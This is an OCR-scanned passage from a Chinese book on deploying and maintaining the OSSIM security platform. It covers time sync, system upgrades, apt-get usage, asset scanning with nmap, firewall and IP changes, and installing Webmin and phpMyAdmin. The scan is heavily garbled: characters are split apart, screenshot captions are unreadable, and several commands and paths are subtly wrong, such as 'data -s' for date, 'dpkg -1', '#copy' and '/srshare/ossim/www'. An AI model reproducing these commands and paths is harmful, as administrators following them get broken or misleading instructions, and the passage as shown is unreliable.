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输入 “date -R” 可 以 查看 当前 时 区 。 
配置 硬件 时 钟 : 


#hwclock --set --date= "12/13/12 08:30:30" 


如 果 系统 时 钟 先前 已 经 设置 好 ， 可 以 根据 系统 时 钟 设置 硬件 时 钟 : 


#hwclock --systohc 


如 果 OSSIM Server 不 能 接 入 互联 网 ， 使 用 “data -s” 命 令 手 动 设置 时 间 和 日 期 。 
常用 NTP 服务 器 如 下 : 


€ 上 海 交 大 NTP 服务 器 : 202.120.2.101。 
€ NTP 上 海 : ntp.api.bz。 
#ntpdate -u 目标 NTP 服务 器 IP 地 址 


再 加 上 这 两 个 服务 器 任何 一 个 即 可 。 

时 间 同 步 要 求 : 由 于 被 采集 系统 的 时 间 不 尽 相同 ,无 法 有 效 支 持 审计 系统 的 关联 分 析 、 进 
行事 件 追 查 。 因 此 企业 网 内 最 好 能 提供 时 间 同 步 或 者 支持 采用 其 他 时 间 同 步 系统 的 能 力 。 当 具 
备 统一 的 时 间 同 步 服 务 器 时 ， 建 议 将 OSSIM 系统 和 被 管理 系统 根据 同一 时 间 源 信号 对 时 间 进 
行 同 步 。 如 果 没 有 统一 的 时 间 源 则 通过 互联 网 手动 同步 。 

时 间 同 步 操 作 ， 默 认 在 OSSIM 系统 安装 时 就 有 ， 但 如 果 系统 没有 与 外 网 链接 ， 这 步骤 今 
后 需要 管理 员 手 动 完成 。 


2.10.2 ”系统 升级 

OSSIM 4.1 可 以 直接 升级 到 OSSIM 4.4， 但 无 法 直接 升级 到 4.8 以 上 系统 ， 需 要 用 新 版 本 
ISO 重新 安装 。 安 装 完 系统 后 ， 首 要 工作 是 升级 软件 及 补丁 ， 其 方法 有 命令 行 方式 和 Web 界 
面 方式 两 种 。 下 面 对 升 级 的 细节 做 一 下 说 明 。 

更 新 源 地 址 : 

#vi /etc/apt/sources.list 


在 sources.list 中 优先 使 用 alienvault 的 ， 我 们 将 Debian 的 源 添 加 在 后 面 : 

deb http://ftp.debian.org/debian/ squeeze-updates main contrib 

deb-src http://ftp.debian.org/debian/ squeeze-updates main contrib 

deb http://ftp2.de.debian.org/debian squeeze main non-free 

此 处 “non-frfee” 表 示 安 装 的 软件 包含 不 符合 DFSG (Debian 自由 软件 指引 ，Debian Free 
Software Guidelines) 要 求 。 

用 命令 行 方式 升级 输入 以 下 命令 : 


#service apache2 stop \\ 停 止 Web 服务 
#alienvault-update \\ 更 新 系统 ， 过 程 较 长 ， 切 勿 强行 中 断 升级 
#apt-get upgrade \\ 更 新 已 安装 的 包 
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当 执 行 alienvault-update 脚本 时 ， 首 先 会 在 usr/share/ossim-installer/ 目 录 下 新 建 目录 temp 
之 后 ， 下 载 http://data.alienvault.com/RELEASES/alienvault4_update-script、alienvault4_ 

preseed.conf、alienvault4_update-script.sig 三 个 文件 ， 都 可 以 用 文本 编辑 器 查看 内 容 。 如 果 
读者 想 了 解 升级 过 程 到 底 修改 了 那些 内 容 ， 只 要 你 具备 SHELL 基础 即 可 查看 alienvault4_ 
update-script 脚本 。 系 统 会 将 升级 日 志 存储 在 /varlogyalienvaulyupdate/ 目录 下 便于 今后 查看 。 


当 升 级 完成 后 , 再 启动 apache2。 如 果 是 OSSIM 4.3 及 以 上 系统 ,建议 使 用 “alienvault-setup” 
方式 进行 升级 ， 在 控制 台中 首先 选择 “0 System Preferences”， 然 后 选择 “5 Update AlienVault 
System”， 如 图 2-49 所 示 。 


图 2-49 升级 OSSIM 


dm 当 你 再 次 使 用 alienvault-update 更 新 系统 时 ,很 多 服务 的 conf 配置 文件 会 被 覆盖 ， 所 以 在 
| 此 操作 前 一 定 要 备份 系统 配置 文件 。 


首先 更 新 程序 会 到 下 列 地 址 下 载 数 据 包 。 


€ http://data.alienvault.com/alienvault4/ 
€ http://security.debian.org 
€ http://ftp.us.debian.org 


以 上 3 个 站 点 下 载 更 新 包 (格式 为 *.deb)， 这 个 更 新 脚本 会 自动 解决 包 冲 突 和 软件 包 依 赖 
问题 ， 它 使 用 source.list 文件 进行 软件 包 管理 ， 在 OSSM 控制 台 上 ， 大 家 可 以 参考 
letc/apt/source.list.d/alienvault4.list 文件 。 


(1) 注意 1: 在 升级 过 程 中 不 要 强行 中 断 ， 否 则 只 能 通过 “dpkg --configure -a” 命 令 修 
复 。 手工 更 新 software_cpe 表 。 

升级 过 程 比 较 长 ， 尤 其 是 在 “update_percona”、“upgrade_dist_download_onyly” 这 两 个 
阶段 等 待 的 时 间 更 长 ， 此 时 一 定 要 耐心 待 系统 全 部 完成 后 ， 再 继续 操作 。 

如 果 无 法 等 待 系统 配置 完成 就 强行 终止 升级 在 以 后 的 包 管 理 中 将 会 发 生 各 种 意 想不到 的 
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问题 ， 那 么 只 能 通过 上 面 介绍 的 命令 尝试 修复 。 


(2) 注意 2: OSSIM 3 和 OSSIM 4 的 版 本 路 径 稍 有 不 同 : 
OSSIM 3 主要 更 新 包 地 址 为 http://data.alienvault.com/alienvault3/binary/Packages。 
OSSIM 4 主要 更 新 包 地 址 为 http://data.alienvault.com/alienvault4/binary/Packages。 
系统 更 新 脚本 会 保存 在 /usr/share/ossim-install/temp/alienvault4_update_script 文件 中 。 
OSSIM 4.3 以 后 的 版 本 升级 Server IP 为 70.38.37.7， 它 对 应 的 域名 为 data.alienvault.com。 


G) 注意 3: 由 于 alienvault-update 首次 升级 系统 时 间 比 较 长 ， 如 果 没 有 耐心 等 待 ， 强 行 
终止 升级 后 续 安装 软件 就 会 遇 到 问题 有 很 多 OSSIM 服务 和 配置 脚本 会 在 “ali envault-update” 
命令 执行 之 后 被 覆盖 , 有 可 能 造成 以 前 正常 工作 的 服务 在 升级 后 失效 , 所 以 建议 大 家 在 升级 前 
一 定做 好 配置 文件 备份 及 测试 环节 。 

实际 上 dpkg 的 操作 被 中 断 了 ， 必 须 手 动 执行 “dpkg --configure -a” 以 修复 这 个 问题 ， 解 
决 方法 是 输入 以 下 命令 : 


#alienvault dpkg --configure -a 


该 过 程 同样 较 长 ， 必 须 耐 心 等 待 整个 过 程 执行 完成 。Web 方式 则 会 在 GUI 界面 自动 提示 
待 单 击 确定 按钮 后 会 自动 进行 。 更 新 完毕 后 ,可 以 通过 命令 行 查看 到 底 有 哪些 OSSIM 数据 包 ， 
使 用 的 命令 如 下 : 

#dpkg -1 |grep ossim 

#dpkg -1 |grep alienvault 

当下 载 完 更 新 包 以 后 ， 系 统 升级 脚本 会 调用 dpkg 解压 并 安装 这 些 包 ， 下 面 最 重要 的 环节 
就 是 OSSIM Reconfig， 它 的 升级 顺序 如 下 : 


Getting IP 

Configuring Server profile 
Configuring Framework Profile 
Set nessus password 
Configuring alienvault-crosscorrelation-free 
Restarting OSSIM-server 
Restarting apache 

Restarting openvas-manager 
Restarting nagios3 

Restarting API service 
Restarting nfsen 

Restarting ossec 

Restarting Asec service 


Restarting ossim-server 
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Restarting ossim Framework 
Restarting ossim-agent 
Restarting memcache 
Restarting firewall 
Restarting ntop 

Restarting rsyslog 
Restarting monit 

Restarting rsync 

Restarting fprobe 


先是 下 载 然后 解 包 安 装 ， 最 后 重启 各 项 服务 结束 整个 配置 过 程 ， 回 到 控制 符 。 在 升级 过 程 
中 不 能 中 断 ， 而 且 要 确保 在 整个 升级 过 程 中 互联 网 出 口 的 顺畅 。 如 果 初 次 安装 的 是 OSSIM 4.1 
版 ， 那 么 在 升级 之 后 会 自动 升级 成 最 新 版 本 。 

如 果 读 者 在 升级 过 程 中 强行 退出 ， 将 有 可 能 造成 系统 底层 的 dpkg 包 管 理工 具 发 生 错误 ， 
万 一 出 现 这 种 情况 ， 大 家 也 别 着 急 ， 还 可 以 尝试 用 下 列 命令 修复 : 

#dpkg --configure -a 


(4) 注意 4: 因为 OSSIM 的 所 有 升级 软件 及 插件 都 需要 在 国外 网 站 同步 更 新 ， 为 了 下 载 
保证 顺畅 ， 建 议 升 级 工作 在 凌晨 进行 。 在 升级 过 程 中 出 现 Igo、Hit 和 Get 分 别 代表 : 
©  Igo-Ignored: 代表 检查 被 忽略 ; 
€ Hit 表示 没 检 查 新 版 本 ， 这 意味 着 目前 是 最 新 的 包 ; 
€ Get: 代表 找到 了 比 现 在 更 新 的 软件 版 本 需要 下 载 升 级 如 果 上 面 一 行 出 现 Get XXX， 
紧 接 着 就 会 开始 下 载 。 


(5) 注意 5: 一 旦 OSSIM 系统 最 终 调试 完毕 ， 不 建议 频繁 使 用 “alienvault-update” 命 令 升 
级 系统 , 跨 版 本 升级 只 能 重 装 系统 ,例如 从 3.x FFE 4.x 或 4x 升 到 5.x, 这 种 情况 下 不 建议 以 update 
方式 升级 。 而 且 建 议 先 在 测试 机 上 完成 测试 ， 确 定 无 误 后 再 正式 升级 。 正 确 的 升级 方法 是 在 控制 
台 下 ， 通 过 Alienvault Setup 界面 中 的 System Updates 来 升级 ， 这 样 可 以 避免 误 操作 。 

(6) 注意 6: OSSIM 系统 使 用 update 升级 后 的 deb 所 处 的 位 置 也 需要 大 家 了 解 ， 当 使 用 
alienvault-update 命令 升级 时 ， 首 先 下 载 软件 包 ， 然 后 解压 并 安装 ， 当 升级 完成 后 剩 下 的 deb 
文件 不 会 自动 消失 。 如 果 磁 盘 空 间 紧 张 时 ， 我们 可 以 把 这 些 文件 删除 ， 这 些 文件 是 
/var/cache/apt/archives/ 目 录 下 *.deb 文件 。 


2.10.3 apt-get 常见 操作 
本 书 涉及 的 软件 安装 都 会 与 apt-cache 和 apt-get. 命令 打交道 ， 这 两 个 命令 是 每 位 OSSIM 
维护 人 员 必 须 掌握 的 操作 命令 ， 详 细 说 明 如 表 2-6 所 示 。 
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表 2-6 aptcache 和 apt-get 命令 


操作 系统 
| apt-cache search package 搜索 包 
apt-cache search ossim 在 软件 包 列表 中 搜索 含有 ossim 字符 串 的 包 
apt-cache show package 获取 包 的 相关 信息 ， 如 说 明 、 大 小 、 版 本 等 
apt-get install package 安装 包 
| apt-get install package - - reinstall 重新 安装 包 
| apt-get -f install 修复 安装 
apt-get remove package 删除 包 
apt-get remove package - - purge 删除 包 ， 包 括 删 除 配置 文件 等 
apt-get update 更 新 源 ， 注 意 如 果 在 修改 了 /etc/aptsources.list 或 
/etc/apt/preferences 之 后 需要 运行 该 命令 
apt-get upgrade 更 新 已 安装 的 包 〈 在 新 装 的 OSSIM 中 常用 ) 
apt-get dist-upgrade 升级 系统 
apt-get dselect-upgrade 使 用 dselect 升级 
apt-cache depends package 了 解 使 用 依赖 
apt-cache rdepends package 查看 该 包 被 哪些 包 依赖 
apt-get build-dep package 安装 相关 的 编译 环境 
apt-get source package 下 载 该 包 的 源 代码 
apt-get clean && sudo apt-get autoclean | 清理 无 用 的 包 ， 清 空 apt 的 缓存 空间 
apt-get check 检查 是 否 有 损坏 的 依赖 


2.10.4 ”扫描 资产 

OSSIM 围绕 资产 进行 管理 和 监控 ， 资 产 管理 在 所 有 服务 管理 中 处 于 核心 地 位 。 作 为 管理 
者 必须 知道 你 有 多 少 资产 ， 它 们 在 哪里 ， 配 置 如 何 ， 所 以 在 OSSIM 系统 装 完 后 首先 开始 对 监 
控 网 段 内 资产 进行 扫描 , 建立 资产 列表 。 扫描 Sensor 所 监控 的 网 段 , 建立 资产 列表 可 在 Web UI 
的 Environment 一 Assets 一 Assets Discovery 中 输入 网 段 CIDR, 选择 Sensor， 然 后 开始 执行 ， 按 
照 默认 选项 扫描 ， 这 时 在 后 台 相 当 于 操作 远程 Sensor 机 器 执行 了 以 下 命令 : 

#nmap -A -T3 -sS -F x.x.x.x/24 -oX -no-stylesheet 


不 建议 用 户 选择 完整 扫描 ， 那 样 将 浪费 大 量 时 间 。 获 取 到 扫描 机 器 列表 后 ， 继 续 单 击 
l i “Update Database Values” 按 钮 ， 保 存 到 数据 库 中 。 


2.10.5 “通过 代理 升级 系统 

使 用 代理 服务 器 升级 OSSIM 可 以 将 OSSIM 系统 本 身 与 互联 网 隔离 ， 以 加 强 系统 安全 ， 
但 系统 升级 又 必须 联网 进行 ，NAT 的 方式 并 不 安全 ， 所 以 下 面 我 们 通过 代理 来 设置 ， 步 又 如 
图 2-50 所 示 。 
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(3) (4) 


(5) (6) 


0) (8) 
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| 


(10) 


2-50 ”代理 设置 组 图 


我 们 打开 /etc/ossim/ossim_setup.conf， 观 察 配置 文件 变化 。 当 然 ， 我 们 也 可 以 直接 修改 配 
置 文件 ， 然 后 输入 “ossim-reconfig”。 接 着 就 可 以 输入 “aplienvault_apt-get update” 开 始 通 过 
代理 升级 系统 。 


2.10.6 ”防火 墙 设置 
OSSIM 默认 Iptables 防火 墙 是 打开 状态 ， 可 以 通过 以 下 命令 ， 查 看 防火 墙 规则 。 


这 些 规 则 都 记录 在 /etc/ossim_firewall 这 个 配置 文件 里 ， 熟 悉 Iptables 的 话 ， 可 以 在 这 个 文 
件 中 直接 修改 。 如 果 在 启动 系统 时 不 启动 Iptables， 可 以 修改 ossim_setup.conf 配置 文件 中 的 
[firewall]， 将 “Active=yes” 改 成 “active=no”。 


ua 对 于 Iptables 的 基础 知识 ， 大 家 可 参考 我 的 这 篇 博文 http://chenguang.blog.51cto.com/ 
i 350944/1601462。 


2.10.7 ”让 控制 台 支 持 高 分 辨 率 

在 高 分 辨 率 下 ， 每 屏 所 展现 的 系统 输出 信息 更 多 ， 所 以 我 们 希望 得 到 更 高 的 分 辩 率 。 默 认 
Kernel 的 TTY 分 辩 率 有 限 ， 解 决 的 方法 是 给 Kernel 传递 VGA 参数 ，OSSIM 刚 装 好 时 默认 分 
HRA 800x600 ， 我 们 通过 以 下 命令 修改 。 


将 vga=788 改 为 “791”。 


€  vga-788: RAIE VESA framebuffer console @ 800 x 600 x 32k. 
€  vga-791: 代表 分 状 率 VESA framebuffer console @ 1024 x 768 x 32k. 


如 果 希 望 还 原 以 前 设置 ， 执 行 如 下 命令 : 
(^ Pupdatemgmb 000 


124 


第 2 章 OSSIM 部 署 与 安装 


E 在 OSSIM 4.11 之 后 的 系统 ， 默 认为 高 分 辩 率 控制 台 。 | 


2.10.8 手动 修改 服务 器 IP 地 址 
手动 修改 IP 地 址 适合 需要 修改 OSSIM Server/Sensor 地 址 的 用 户 ， 一 般 用 户 无 须 修改 。 步 
Ju b: 


(DD vi /etc/network/interfaces 
改过 之 后 : 
/etc/init.d/networking restart 


(2) vi /etc/ossim/ossim setup.conf. 
修改 第 1 1T, admin ip 字段 的 IP. 
修改 第 40 行 ，framework ip 字段 的 卫 。 
改过 之 后 保存 退出 。 


#ossim-reconfig 

(3) 修改 防火 墙 规则 

#vi /etc/ossim firewall 

如 “-A INPUT -p tcp --dport 3000 -s 192.168.0.10 -j ACCEPT" . 


另外 , 大 家 还 可 以 在 OSSIM Server. 的 控制 台 上 , 通过 输入 ossim-setup 命令 启动 一 个 图 形 
化 菜单 进行 修改 。 


2.10.9 ”修改 系统 网 关 和 DNS 地 址 
解决 方法 和 上 一 小 节 修 改 服务 器 IP 地 址 类 似 ， 修 改 /etc/ossim/ossim_setup.conf 文件 中 
admin gateway, admin dns 变量 的 值 即 可 ， 改 过 后 保存 退出 ， 执 行 以 下 命令 以 便 设置 生效 : 


#0ssim-reconfig 


2.10.40 ”更 改 默 认 网 络 接口 
由 于 特殊 需要 ， 需 要 将 默认 eth0 改 成 ethl 接口 ， 下 面 给 出 步骤 : 
A) 添加 第 二 块 网卡 ethl 。 
(2) 根据 /etc/snort 目录 下 的 eth0 网 卡 配置 文件 snort.eth0.conf 生成 snort.eth1.conf 做 适量 
调整 。 
(3) 编辑 /etc/ossim/ossim_setup.conf， 在 [sensor] 中 修改 interface-ethl 。 
(4) 编辑 /etc/ossim/agent/plugins/snortunifed_eth0.cfg， 并 将 它 的 名 字 改 成 snortunifed_ethl.cfg。 


125 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


(5) 运行 ossim-reconfig。 


2.10.11 消除 登录 菜单 

1E OSSIM 4.3 版 本 之 后 ， 为 了 保证 安全 ， 加 入 了 登录 菜单 就 是 我 们 看 到 的 ossim-setup， 
习惯 了 命令 行 操作 的 朋友 感觉 这 种 改变 不 方便 ， 解 决 方法 是 修改 /etc/passwd 中 root 所 在 行 中 
的 shell， 有 具体 方法 是 : 

#vi /etc/passwd 

找到 root 所 在 行 ， 将 /usr/bin/llshell 修改 为 /bin/bash 即 可 ， 经 过 这 样 修改 之 后 ， 再 使 用 
WinSCP 就 能 方便 地 与 OSSIM 相互 传输 文件 。 

注意 : 如 果 在 OSSIM 4.8 和 OSSIM 4.9 系统 中 ， 修 改 如 下 : 


#vi /root/.bashrc 


注销 如 下 语句 (如 图 2-51 所 示 ): 


# (1) for non-login shells. 


图 2-51 注销 .bashrc 配置 中 的 语句 


修改 后 保存 退出 即 可 。 


2.10.12 进入 OSSIM 单 用 户 模 式 
默认 情况 下 OSSIM 无 法 进入 单 用 户 模式 ， 当 磁盘 故障 时 则 无 法 修复 文件 系统 。 大 家 可 以 
在 刚 装 完 系统 时 设置 单 用 户 登录 模式 ， 方 法 详 见 2.14.2 节 。 
另外 在 某 些 情况 下 WinScp 无 法 登录 OSSIM 系统 ， 这 时 读者 可 以 打开 OSSIM Server 上 的 
/etc/passwd 文件 ， 修 改 root 用 户 的 shell， 将 原来 “/usrbimllshell” 改 为 “/bin/sh” 即 可 解决 。 还 有 
另 一 种 方法 ， 修 改 .bashre 脚本 ， 以 root 用 户 角色 修改 /root.bashrc 文件 ， 把 以 下 语句 注销 即 可 : 
#if [ “$jailbreak” != "yes" ];then 
#if [[ $- — "i^ ]];then 
Sossim-setup 
fexit 


#fi 
#fi 


2.10.13 ”定制 系统 启动 界面 
开机 引导 时 动画 效果 由 Plymouth 来 管理 ， 如 果 你 只 是 要 简单 地 修改 一 下 开机 时 的 背景 
Logo， 比 如 关机 中 出 现 的 Logo 就 在 下 列 地 址 : 
/usr/share/Plymouth/themes/alienvault/alienvault logo.png， 蔡 换 即 可 。 
下 面 通过 定制 plymouth 来 修改 。 
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( *Plymuth-set-defawlt-theme 0 0 
系统 中 已 经 有 的 主题 : 


(1) 安装 主题 


(2) 查看 当前 plymouth 的 主题 


(3) 改变 主题 


其 中 选项 “-R” 要 求 重新 制 做 initrd 文件 ， 没 有 这 个 选项 ， 主 题 改 变 不 会 生效 ， 重 启 系统 
即 可 以 看 到 效果 。 


2 了 .11 OSSIM 启动 与 停止 


一 般 情况 下 一 个 OSSIM Server 服务 器 端 ， 若 干 个 Sensor (传感器 ) 组 成 一 个 简单 的 分 布 
式 系统 。 

以 OSSIM 4.3 启动 过 程 为 例 : 

系统 启动 时 ， 按 F2 键 可 查看 各 项 服务 加 载 详情 。 

(1) 开机 启动 
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u 在 OSSIM 4.6 的 后 续 版 本 中 增加 了 rabbitmq-server. redis-server. celerd. celerybeat 服务 。 ) 


QD 系统 关闭 过 程 

OSSIM 的 关闭 过 程 是 ， 首 先 关 闭 OSSIM Sensor 主机 ， 然 后 关闭 OSSIM Server。 具 体 方 
式 是 在 控制 台 上 选择 第 六 项 菜单 “Shutdown Appliance", 如 图 2-52 所 示 。 因 为 这 样 操作 可 以 
保护 数据 和 文件 系统 的 完整 性 。 


图 2-52 关闭 OSSIM 
INIT 进程 切换 到 运行 级 别 6 发 送 终 止 信号 以 后 ， 系 统 活动 如 下 : 
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OSSEC HIDS; 
停止 Nfsen nfcapd; 
停止 OSSIM Agent ossim-agent; 
停止 OSSIM Server : ossim-server; 


停止 Postfix 邮件 服务 器 ; 
停止 resolvconf; 

Bub squid 服务 ; 

停止 mysql 数据 库 ; 

停止 rsyslog 服务 。 


安装 远程 管理 工具 


默认 情况 下 OSSIM 系统 能 够 通过 SSH 方式 远程 管理 , 下 面 介绍 两 款 更 直观 便捷 的 工具 一 
一 基于 Web 的 管理 工具 : Webmin 和 phpMyAdmin. 

Webmin 是 管理 员 理 想 的 远程 管理 工具 ， 它 通过 HTTPS 协议 在 保证 安全 的 前 提 下 提供 简 
单 而 深入 的 远程 管理 功能 ， 利 用 图 形 化 界面 引导 用 户 完 成 配置 工作 ， 包 括 以 下 主要 内 容 : 

€ Apache. SSH. Firewall 等 各 种 服务 、 应 用 配置 及 备份 任务 。 

© ”系统 用 户 管 理 ， 启 动 项 管理 ， 文 件 系统 备份 ， 日 志文 件 轮 询 配置 ，PAM 认证 管理 ， 

计划 任务 管理 ， 软 件 包 的 管理 。 
€ Apache. MySQL. Postfix 等 重要 服务 管理 。 
e 带宽 监控 、 防 火 墙 配置 、TCPWrapper 配 置 ， 还 包含 硬件 配置 和 集群 管理 。 


2.12.1 安装 Webmin 管理 工具 
OSSIM 支持 Webmin， 系 统 安装 此 管理 工具 的 目的 是 方便 使 用 者 管理 系统 。 具 体 安装 步骤 
如 下 : 
(1) 在 Webmin 的 官网 (www.webmin.com) 下 载 Webmin 安装 包 (目前 最 新 1.76)， 解 
压 并 安装 〈./setup.sh)， 过 程 略 。 
(2) 当 Webmin 安装 好 后 ， 系 统 将 在 10000 端口 监听 请 求 ， 登 录 系 统 在 浏览 器 地 址 栏 输 
入 http:/ 主 机 名 (ER IP). :10000， 例 如 http://alienvault:10000/。 
#netstat -nalgrep 10000 \\ 测 试 服务 是 否 启动 
由 于 OSSIM 默认 没有 图 形 界 面 ， 这 时 会 发 现 本 机 无 法 登录 ， 利 用 基于 文本 的 浏览 〈lynx) 
可 以 测试 是 否 连 上 系统 ， 在 OSSM 里 安装 X-window 可 以 连接 。 建 议 大 家 修改 
/etc/webmin/miniserv.conf 配置 文件 ， 在 这 个 配置 文件 的 最 后 一 行 加 入 “allow= 网 络 号 (IP 地 址 
也 可 以 ) ”， 即 可 实现 远程 访问 。 
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2.12.2 ”安装 phpMyAdmin 

自从 1998 年 9 月 ， 由 Tobias Ratschiller 发 布 第 一 个 phpMyAdmin 工具 以 来 ， 该 项 目 已 成 
为 MySQL 数据 库 维护 的 主要 工具 之 一 ， 它 的 最 大 特点 就 是 直观 ， 几 乎 所 有 的 内 容 都 是 通过 图 
形 化 方式 展现 ， 特 别 是 其 中 分 析 数 据 表 功 能 可 以 帮助 我 们 分 析 OSSIM 数据 库 ， 由 于 OSSIM 
系统 主要 采用 了 MySQL 数据 库 ,在 对 MySQL 的 管控 方面 比 Webmin 更 强大 所 以 使 用 phpMy 
Admin 来 远程 监控 和 管理 数据 库 比 较 方便 。 
例如 ， 当 OSSIM 系统 “吃紧 ”时 ， 它 可 以 帮助 我 们 快速 查看 服务 器 运行 状况 ， 这 样 可 以 
迅速 地 排除 故障 原因 。 而 且 只 需 单 击 鼠标 就 能 方便 地 备份 和 恢复 数据 库 , 不 足 之 处 是 无 法 备份 
数据 库 中 的 某 几 个 表 ， 这 里 告诉 大 家 一 个 解决 办 法 ， 我 们 知道 备份 出 来 的 都 是 SQL WA, R 
们 获得 备份 的 文件 后 打开 脚本 , 找到 需要 表 生 成 的 备份 , 复制 到 另 一 个 文本 文件 并 保存 为 SQL 
扩展 名 ， 然 后 用 查询 分 析 器 执行 即 可 。 

然后 执行 下 面 4 个 步骤 : 

(1) 在 http//www.phpmyadmin.net/Id 3l; F2X phpMyAdmin 压缩 包 ， 实 验 中 下 载 的 压缩 包 
名 称 为 phpMyAdmin-4.4.14.1-all-languages.zip， 代 表 多 国语 言 版 ， 这 也 是 目前 比较 新 的 版 本 ， 
将 它 下 载 到 /root 目录 ， 然 后 解压 ， 进 入 phpMyAdmin 目录 ， 将 config.sample.inc.php 修改 成 
config.inc.php， 其 他 内 容 不 变 。 


#unzip phpMyAdmin-4.4.14.1-all-languages.zip 
#cd phpMyAdmin-4.4.14.1-all-languages.zip 
#copy config.sample.inc.php config.inc.php 
(2) 将 phpMyAdmin 目录 移动 到 OSSIM 网 站 根 目录 ， 即 /srshare/ossim/www， 再 到 
/etc/ossim/framwork 目录 下 查看 ossim.conf 配 置 文件 ， 如 图 2-53 所 示 。 
#mv /root/ phpMyAdmin-4.4.14.1-all-languages /usr/share/ossim/www 
TCD 


# Base dir 
IE TELE AE HERE IE DE TE HEHE EHE E ETE HEHE HE EHE PEDE HE HE HE E ETE HEHE HE HERREN 8 8 


re/php/adodb^ 


[IHE IEIE THE HE HERE E DEDE LEHE HERE EE DEDE HEHEHE TEE E TEHEHEHE HE DEDE HEHEHEHEH IEEE NE 
# OSSIM db configuration 
MED HERE LE HE AE EE RETE HE HE HERE E DEDE HE HE HE E E DE DEHEHE HERE BLEHEHEHE NE E D A E 


n host- 
ossim port-3306 


图 2-53 数据 库 密码 


G) 打开 浏览 器 访问 phpMyAdmin, 输入 网 址 : https://ip/ossim/ phpMyAdmin-4.4.14. 1-all- 
languages/， 提 示 用 户 名 和 密码 ， 有 些 读者 可 能 不 知道 如 何 处 理 ， 其 实 登 录用 户 名 为 root， 登 
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录 密 码 为 MySQL 数据 库 管理 员 的 密码 。 该 密码 信息 在 /etc/ossim/ossim_setup.conf 同样 能 看 到 。 
访问 效果 如 图 2-54 所 示 。 


phpMyAdmin |E zs 
among | 3 seš [jSGL & ks s H^ B SH JSA P BR | RM o EB B TOR (d d 
近期 访问 Aug 


c. | mse cnm fith MARGAR ür Rk 

Bhew | 

I 自 启动 以 来 的 内 部 查询 :931 i) 

Eg) alenvautt 
三 3 alenvout 
uL 
d 
EE 


olenvoult_opi 
$ alenvoult_osec 
由 3 olenvout sem 
市 i cotegorkotion 

出 a dotoworenouse 

EL information schema 
$ a 5O27001An 


ds myadmin 


| show biniogs 404 0 
i.) pertormance schema Seo ] aws Ot 


$a phpmyadmin 


图 2-54 phpMyAdmin 界面 


(4) 修 改 登录 超时 时 间 : 修改 config.default.php 文件 中 “$cfe[‘LogincookieValidity’]=1440” 
一 行 的 数值 1440， 与 此 同时 还 需要 确保 这 个 修改 的 值 等 于 php.ini 文件 中 
“session.gc_maxlifetime=1440” 这 行 配置 中 定义 的 数值 。 

OSSIM 4.3 系统 中 默认 有 13 个 数据 库 , 在 左边 一 栏 中 共 显 示 了 15 个 数据 库 ， 后 面 括号 中 
的 数字 代表 表 的 数目 。 

上 面 讲 了 源码 安装 phpMyAdmin， 也 可 以 在 OSSIM 4.x 系统 中 采用 以 下 命令 方式 安装 
phpMyAdmin: 

#alienvault-update 

#apt-get install phpmyadmin \\ 版 本 为 3.3.7， 下 载 包 大 小 约 为 17MB 

当 见 到 “Configure database for phpmyadmin with dbconfig-common” 提 示 ， 选 择 下 一 步 ， 
此 时 输入 MySQL 数据 库 管 理 员 口 令 ， 然 后 设 定 phpMyAdmin 口令 ， 接 着 设置 安装 在 哪 一 个 
Web Server 之 下， 系统 选择 apache2 继续 ， 选 择 下 一 步 ， 在 这 里 最 容易 出 现 的 错误 是 数据 库 的 
权限 错误 ， 例 如 屏幕 提示 “ERROR 1045 (20000) :Access denied for user 'root'@'localhost' (sing 
password:YES”。 在 随后 出 现 的 对 话 框 中 选择 “ignore” 

系统 提示 输入 数据 库 和 管理 员 密 码 ， 登录 后 , 经 过 配置 就 可 以 使 用 , 这 里 和 源码 包 使 用 不 
同 的 是 ， 输 入 地 址 为 Http://IP/phpmyadmin/。 

在 使 用 phpMyAdmin 时 需要 注意 两 点 : Q@ 安 装 最 新 的 正式 发 布 版 本 ， 这 样 可 以 使 用 
MySQL5.6 的 新 特性 。@) 安 装 到 服务 器 后 ， 目 录 不 能 保留 默认 的 名 称 ， 建 议 将 目录 改名 。 
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2.12.3 用 phpMyAdmin 同步 功能 迁移 数据 库 
在 phpMyAdmin 中 使 用 同步 功能 迁移 数据 库 ， 如 图 2-55 所 示 。 同 步 页 面 会 显示 源 数据 库 
和 目标 数据 库 ， 需 要 设置 源 数据 库 中、 用 户 、 密 码 ， 然 后 选择 本 地 数据 库 名 称 。 


| 源 数据 库 指 的 是 用 户 需要 导出 的 数据 库 ， 目 标 数据 库 指 的 是 要 导入 的 数据 库 ， 所 以 ， 源 数 
| 据 库 要 选择 “远程 服务 器 ”， 目 标 数据 库 就 要 选择 当前 服务 区 器 。 


phpMyAdmin 9 'ocohost 


camBmgo pma msc. gus gem [Tn gium DER lan dus qeu pra "ms 
e ISO27001An (11) "ms 
$ PCI3 se 
Eig 
OU ollenvault (214) umm BINHER 
o 17) zumsa D «nus DB 
2 Ses E192.168.11.28 Dini PE 
B on nl "n : ahenvault api 
2 noma Yon schema (6s) — vem 
Im zm i aR? cum 
$ ocsweb (51 dumenrahon 
: Sene ,homo on | APE oot Temar 
saam EB Qe zu 
REE alienvaulk ee 
Pei 
PCI 55 
pericrmance schema 
图 2-55 迁移 数据 库 


分 布 式 系统 查看 传感器 状态 


在 OSSIM 系统 分 布 式 部 署 中 , 我 们 通常 需要 快速 预览 多 个 传感器 的 各 项 状态 , 例如 IDS 
漏洞 扫描 、Netflow 等 子 系统 的 工作 状态 。 完 成 下 面 实验 之 前 ， 请 确保 浏览 器 能 够 正常 连接 谷 
歌 地 图 ， 设 置 方法 如 下 。 


2.13.1 设置 指示 器 

首先 在 Dashboards 一 Risk Maps 中 定义 传感器 ， 首 次 进入 时 单 击 “Set indicators” 按 钮 , 为 
新 指示 器 输入 名 称 之 后 ， 在 Assets 资源 池 中 选择 一 个 资源 ， 并 在 其 中 选择 新 建 一 个 Indicator 
(指示 器 )， 同 时 在 右 侧 地 图 中 会 出 现 一 个 图 标 , 如 图 2-56 所 示 , 设置 新 指示 器 的 名 称 为 test, 
设置 完成 后 ， 单 击 保存 按钮 。 
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v " 
图 2-56 添加 Location 指示 器 
接着 进入 Dashboards 一 Deployment status， 会 发 现 没 有 数据 ， 因 为 这 是 首次 设置 ， 需 要 用 
户 单 击 “Add location” 按 钮 。 
弹出 如 图 2-57 所 示 对 话 框 。 例 如 输入 名 称 “chenguang”， 在 图 中 放大 镜 表 单 的 位 置 输入 
Q [sss 911001 兴 标 ， 新 建立 的 指示 器 名 称 test， 选 择 需要 监控 的 传感器 名 称 。 并 单 击 添加 伟 
